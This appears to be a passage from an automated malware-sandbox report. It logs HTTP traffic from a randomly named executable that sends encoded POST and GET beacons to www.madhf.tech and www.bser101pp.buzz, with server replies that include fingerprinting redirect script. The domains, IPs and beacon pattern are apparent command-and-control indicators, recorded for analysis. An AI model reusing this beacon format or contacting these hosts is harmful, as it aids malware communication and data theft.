                                                          7192.168.2.849724103.224.182.24280516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:27:09.098942995 CET1656OUTPOST /6ou6/ HTTP/1.1
                                                          Host: www.madhf.tech
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.madhf.tech
                                                          Content-Length: 1241
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.madhf.tech/6ou6/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Raw: 4d 56 57 64 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4f 57 45 43 74 41 38 43 57 74 65 78 5a 66 4b 56 6b 66 48 56 42 4a 32 31 37 35 77 37 65 54 37 48 6d 66 72 38 7a 4a 56 2f 4b 67 50 45 41 6d 32 7a 44 79 30 79 50 58 4c 31 4b 35 74 70 30 41 36 2f 37 53 73 78 51 66 72 43 75 6d 37 68 6f 64 46 69 32 4d 68 45 35 4c 52 74 50 45 76 52 51 37 69 2f 4c 5a 41 6b 50 47 41 4c 51 2b 78 4a 4c 50 63 68 75 67 44 49 74 41 38 49 53 6a 48 50 6d 45 4f 36 44 59 42 4a 61 52 61 74 4e 72 4c 69 48 59 7a 4e 76 74 56 32 55 79 73 4a 69 53 53 4b 66 30 4d 50 6f 33 41 57 61 33 72 72 4d 67 34 72 45 49 31 32 36 63 4a 4a 6d 47 33 4f 52 65 69 73 5a 75 38 50 50 4a 42 58 6c 55 61 76 53 43 43 6f 46 69 64 79 2b 35 6e 38 4d 39 49 68 4e 46 32 73 74 4a 71 31 6c 53 45 56 75 37 2f 39 6f 48 71 53 57 44 77 73 4a 65 48 4c 75 35 46 4f 36 41 38 31 50 4e 62 32 5a 75 4a 4c 56 43 61 78 74 6d 62 46 4d 6a 33 64 58 46 56 34 78 48 49 69 66 45 2f 57 71 33 48 6a 45 54 66 45 55 72 71 44 73 44 49 30 75 52 71 61 70 59 35 41 47 49 47 50 33 73 51 4c 34 30 48 52 42 [TRUNCATED]
                                                          Data Ascii: MVWd=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eT7Hmfr8zJV/KgPEAm2zDy0yPXL1K5tp0A6/7SsxQfrCum7hodFi2MhE5LRtPEvRQ7i/LZAkPGALQ+xJLPchugDItA8ISjHPmEO6DYBJaRatNrLiHYzNvtV2UysJiSSKf0MPo3AWa3rrMg4rEI126cJJmG3OReisZu8PPJBXlUavSCCoFidy+5n8M9IhNF2stJq1lSEVu7/9oHqSWDwsJeHLu5FO6A81PNb2ZuJLVCaxtmbFMj3dXFV4xHIifE/Wq3HjETfEUrqDsDI0uRqapY5AGIGP3sQL40HRBNNsiZ6yhbpBX0Gx7uzC2izWsQWyH2SIHijcJ7ag2967fLnXPilx2oTd1NVCkytqTLiMe4tWrZpu4IceN7msNkZkVidFTM6ciGbBEF3ctZvN9/JXRwRJdpq6GzZDSb2fgS9mRp53lnmHxeIyfT2t3EgpUC+u5boTK3M5ETtxMMUDL0vZ1+F19WVtzXrXC4negw+YF2pVicOPTiL7+GIC5BcSorNp/ah3XWS/YF1QnS322PFg6NYBdsfUSMruWmcTeoDCCZSJye6SO6nVCRNhV5SonzArweCWfI02v0g76KsGNvOVCR5cEeXIZbwBsv0PtS5IgK6TMnyBTAshV9stPdaoqmm+J/iVybTZA7qUFSJVfuXIKqdGgaQ5rBkcK9auTOnOH+dCsNy/MKVDiAbPfz0HsIsSv5KJWZ5njjrm+c+jTpZ3BmSylcKSAhJLZH7I09+WfeZTK5Stu1UxBec1eKCZvz8adcgWqtty3CP/8bA4KJG1JGZ8/RTAfqKgwO+IWfFuJCQnPD+24U8yQMrpt6zAhZsZMQpMVtHve9FD8pk2UklOc4wj7iMr2tDFG6DtsgJxjZqWuSOiSttmIZ2Gz24kFIQF9e3xUE5I7hHvcANry4kS29yXlQH319o+EE/DtkMCiy3LLqpO/COg3LYgeRE933vN81kaSjm [TRUNCATED]
                                                          Dec 3, 2024 14:27:10.373516083 CET871INHTTP/1.1 200 OK
                                                          date: Tue, 03 Dec 2024 13:27:10 GMT
                                                          server: Apache
                                                          set-cookie: __tad=1733232430.2077707; expires=Fri, 01-Dec-2034 13:27:10 GMT; Max-Age=315360000
                                                          vary: Accept-Encoding
                                                          content-encoding: gzip
                                                          content-length: 576
                                                          content-type: text/html; charset=UTF-8
                                                          connection: close
                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                          Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.849725103.224.182.24280516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:27:11.750102043 CET363OUTGET /6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5Q/485VI7OI/8adtFmnjL5G+X4c0GC9YevItAMgBvFKG4A==&kfm=dFj0Olb HTTP/1.1
                                                          Host: www.madhf.tech
                                                          Accept: */*
                                                          Accept-Language: en-us
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Dec 3, 2024 14:27:13.061113119 CET1236INHTTP/1.1 200 OK
                                                          date: Tue, 03 Dec 2024 13:27:12 GMT
                                                          server: Apache
                                                          set-cookie: __tad=1733232432.1876202; expires=Fri, 01-Dec-2034 13:27:12 GMT; Max-Age=315360000
                                                          vary: Accept-Encoding
                                                          content-length: 1502
                                                          content-type: text/html; charset=UTF-8
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 36 6f 75 36 2f 3f 4d 56 57 64 3d 57 65 37 32 6b 32 55 38 52 71 79 48 4e 78 39 63 30 6c 67 72 63 4d 61 6a 50 2b 37 50 79 64 50 6e 43 61 75 30 35 4b 51 4d 55 6a 57 6d 71 37 33 49 7a 75 70 46 64 52 47 64 64 6e 6d 58 43 53 52 64 4d 55 72 6b 47 4b 64 51 30 41 48 59 38 6a 42 49 55 63 2f 74 35 51 2f 34 38 35 56 49 37 4f 49 2f 38 61 64 74 46 6d 6e 6a 4c 35 47 2b 58 34 63 30 47 43 39 59 65 76 49 74 41 4d 67 42 76 46 4b 47 34 41 3d 3d 26 6b 66 6d 3d [TRUNCATED]
                                                          Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5Q/485VI7OI/8adtFmnjL5G+X4c0GC9YevItAMgBvFKG4A==&kfm=dFj0Olb&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#fff
                                                          Dec 3, 2024 14:27:13.061270952 CET538INData Raw: 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 36 6f
                                                          Data Ascii: fff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5Q/485VI7OI/8adtFmnjL5G+X4c0GC9YevItAMgBvFKG4A==&kfm=dFj0Olb&fp=-3'>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.849726188.114.96.680516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:27:18.509380102 CET631OUTPOST /v89f/ HTTP/1.1
                                                          Host: www.bser101pp.buzz
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.bser101pp.buzz
                                                          Content-Length: 205
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.bser101pp.buzz/v89f/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Raw: 4d 56 57 64 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 51 61 45 52 37 58 6a 38 69 33 31 67 51 44 61 6a 45 7a 6b 68 38 53 48 68 59 45 59 68 2f 63 66 51 33 41 77 37 34 34 78 48 36 6a 65 7a 67 37 43 63 75 77 30 32 71 52 34 67 54 33 52 4e 6d 57 55 73 57 37 51 55 78 31 5a 45 32 59 6f 35 68 68 33 47 54 33 54 75 55 58 36 67 47 35 66 45 39 71 6d 59 48 7a 74 45 34 56 2b 64 48 34 6f 66 5a 71 69 5a 67 36 6e 7a 6f 44 2f 75 43 71 7a 4f 50 36 51 37 62 42 46 64 75 6b 68 55 4b 2b 64 57 4c 78 56 32 39 58 50 70 30 31 38 79 73 2f 76 38 73 78 69 78 5a 72 75 35 64 43 72 46 5a 36 77 7a 50 64 72 47 45 52 70 39 2b 2f 62 57 2f 68 30 3d
                                                          Data Ascii: MVWd=iTfEV/Gi0JnQQaER7Xj8i31gQDajEzkh8SHhYEYh/cfQ3Aw744xH6jezg7Ccuw02qR4gT3RNmWUsW7QUx1ZE2Yo5hh3GT3TuUX6gG5fE9qmYHztE4V+dH4ofZqiZg6nzoD/uCqzOP6Q7bBFdukhUK+dWLxV29XPp018ys/v8sxixZru5dCrFZ6wzPdrGERp9+/bW/h0=
                                                          Dec 3, 2024 14:27:19.780008078 CET972INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 13:27:19 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzkmMgX7hAH%2Bm97loqvHeP1p7yz8GLRvkDCNE05aZQTHntbGzyR%2BESEFFyaFuZZfjTV6d6lf6zECd4zGLpL7JWr6h0XtSLMaZLDqa8tRB5R5G6aGENbEQsktyVynRToLzbu0BQ4%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec3e4baff950f85-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=631&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.849727188.114.96.680516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:27:21.221596956 CET651OUTPOST /v89f/ HTTP/1.1
                                                          Host: www.bser101pp.buzz
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.bser101pp.buzz
                                                          Content-Length: 225
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.bser101pp.buzz/v89f/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Raw: 4d 56 57 64 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 57 35 73 52 35 32 6a 38 6c 58 31 6a 66 6a 61 6a 4f 54 6b 6c 38 53 44 68 59 46 63 78 2b 75 4c 51 30 68 41 37 69 35 78 48 32 44 65 7a 34 4c 44 57 77 41 30 39 71 52 30 53 54 7a 52 4e 6d 57 41 73 57 35 59 55 77 43 4e 48 32 49 6f 37 74 42 33 41 4f 6e 54 75 55 58 36 67 47 35 4c 75 39 75 4b 59 48 44 64 45 71 67 43 63 63 59 6f 63 65 71 69 5a 33 71 6e 33 6f 44 2f 49 43 72 76 67 50 35 6f 37 62 41 31 64 75 51 56 4c 66 4f 64 63 50 78 55 6c 2b 6c 47 53 32 46 4d 41 68 4f 44 77 67 33 6d 4f 63 64 66 54 48 67 6a 44 61 36 59 59 50 65 44 77 42 6d 30 56 6b 63 4c 6d 68 32 69 77 50 2b 49 74 79 44 2b 79 50 43 62 7a 50 67 2b 46 44 34 68 33
                                                          Data Ascii: MVWd=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uLQ0hA7i5xH2Dez4LDWwA09qR0STzRNmWAsW5YUwCNH2Io7tB3AOnTuUX6gG5Lu9uKYHDdEqgCccYoceqiZ3qn3oD/ICrvgP5o7bA1duQVLfOdcPxUl+lGS2FMAhODwg3mOcdfTHgjDa6YYPeDwBm0VkcLmh2iwP+ItyD+yPCbzPg+FD4h3
                                                          Dec 3, 2024 14:27:22.371922016 CET978INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 13:27:22 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNkww1UWROTOo%2Blk68FSR2qThOGbuDk3tnMRoTBKFOaWoUavcohUuXGztV3L3iD%2BUCZGOLEAnJPRrEzTKTPX%2BbfMiNkN1yuZ2sYsuak2ZU%2FnZN%2Fd8Dp7ob2ZxhZLH74DkE7Gb6s%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec3e4cb4f618cba-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1830&rtt_var=915&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=651&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.849728188.114.96.680516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:27:23.949754953 CET1668OUTPOST /v89f/ HTTP/1.1
                                                          Host: www.bser101pp.buzz
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.bser101pp.buzz
                                                          Content-Length: 1241
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.bser101pp.buzz/v89f/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Raw: 4d 56 57 64 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 57 35 73 52 35 32 6a 38 6c 58 31 6a 66 6a 61 6a 4f 54 6b 6c 38 53 44 68 59 46 63 78 2b 75 54 51 30 54 49 37 34 61 5a 48 33 44 65 7a 31 72 44 56 77 41 30 67 71 56 59 73 54 7a 56 64 6d 55 34 73 58 63 4d 55 67 67 31 48 34 49 6f 37 77 78 33 42 54 33 53 73 55 58 71 73 47 35 62 75 39 75 4b 59 48 46 78 45 70 31 2b 63 62 6f 6f 66 5a 71 69 64 67 36 6e 54 6f 44 57 7a 43 71 62 65 50 4a 49 37 61 67 6c 64 31 46 68 4c 44 65 64 53 4b 78 56 69 2b 6c 61 4e 32 46 51 4d 68 4f 47 66 67 77 71 4f 66 59 69 57 43 52 50 49 4c 71 42 6d 52 73 4c 34 61 57 45 7a 6c 2f 71 51 68 56 47 4e 49 4f 41 6e 2f 44 6a 38 50 43 44 33 62 55 36 6b 54 75 41 6e 66 42 69 72 2f 69 58 76 46 4b 47 31 34 5a 75 51 69 38 50 4c 50 61 53 79 32 75 79 6e 48 61 71 55 70 32 45 41 38 64 75 43 30 68 41 39 61 64 6e 62 46 4c 42 66 65 51 67 6e 62 52 51 6c 6f 4c 46 41 58 73 77 50 71 49 75 78 35 33 53 4f 6a 47 47 67 4a 68 76 68 74 37 4a 36 37 68 4d 44 43 50 33 65 4c 4d 35 46 43 46 51 6f 6d 59 47 45 32 64 76 61 47 [TRUNCATED]
                                                          Data Ascii: MVWd=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uTQ0TI74aZH3Dez1rDVwA0gqVYsTzVdmU4sXcMUgg1H4Io7wx3BT3SsUXqsG5bu9uKYHFxEp1+cboofZqidg6nToDWzCqbePJI7agld1FhLDedSKxVi+laN2FQMhOGfgwqOfYiWCRPILqBmRsL4aWEzl/qQhVGNIOAn/Dj8PCD3bU6kTuAnfBir/iXvFKG14ZuQi8PLPaSy2uynHaqUp2EA8duC0hA9adnbFLBfeQgnbRQloLFAXswPqIux53SOjGGgJhvht7J67hMDCP3eLM5FCFQomYGE2dvaG5mRYsHBQihFb3p3W2jezpBR7aCqqew2WkkXtoiholR9tSi0j+3J+rH6Qlan1F8lXD5OkDFfl+TmjyZMxngSLTJQW4PTUN4EuHvjfJ1rr7QfbSsUQIq7rGm9R8MIbkcoFtej2DenAJoMnm4JyzAURABw675oLh29DPRFjChTNGz5Cch0F1X05vXdRO3kVealGmWZLhPPbYuGXCGDpHKcv2wRuLgpe0ZI5ORHELeTSH3MKebHKgYGl7gQ0/IBfS63NYuDs+YwmUKa1ThR6kaNAaqEHY5Zina8UiXdGkfYw69LPO490VRA3Wnp+2XuqqBVfsjEuOnl6PvRDlAB3LmSlJ9ki7uxWISz+ZYnnEHl0TXBgSW9tqySQbp4C0520y9EY6hmIxx8jLUOfrCXPy1ZRYKzUL2JZx9bC/94JA561zO8bwJfWFo9IDIGdSLocjaaCcvMPILKM0mEyhhvU549dLjelrtb+H+QEMldTSYAcDLhEe6DqWN4+kD/BT6QnFMxMVLAW8CT3BtHZPVidBBaomPOc2HaEKAdVWri7dJdVDrydt55oYv2dS4sE10fV/YEMHoxzpjGPoTZXDezcWlVr7iOlfvTtvxz4KB3QIpRXLYfVAEq4bTU2Dc5Zn2AnKmfP/3n1SPK62Gi6TQpcStXphtlrodjwyA2GQF [TRUNCATED]
                                                          Dec 3, 2024 14:27:25.141880989 CET977INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 13:27:24 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XCy3YQYA1lfXqxnAMS6BJLEGhc3jGG9HfPFvCd36ZKeHtkpuZtjhxdcDDkztvLEZD6r5V76EqbhNjtqfFMJgth2dkOG%2B479QCq2ZDYiI4YKve14s%2BVDgul%2FMlyyeY7eche%2FLiNs%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec3e4dc9e8842b2-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1756&rtt_var=878&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1668&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.849729188.114.96.680516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:27:26.835736990 CET367OUTGET /v89f/?MVWd=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2NYglVjUbXXrY07zMLLi7rmhcEJnvkrNOok7dcSq1J6Z3g==&kfm=dFj0Olb HTTP/1.1
                                                          Host: www.bser101pp.buzz
                                                          Accept: */*
                                                          Accept-Language: en-us
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Dec 3, 2024 14:27:28.045676947 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 13:27:27 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rzkl7NWsk3UkFgzvkz7zTOa5hmLHq1FEv0tp1hnubdSblP2mwWu7%2BNXZ4Y%2BL019cEAmk84zMgcWIH1X31hOknhpCoGKlqloK40VblXVWemRygVvXV0bKPqpYcuQnYsei%2Fi4lMe8%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec3e4eea9a32363-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=367&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
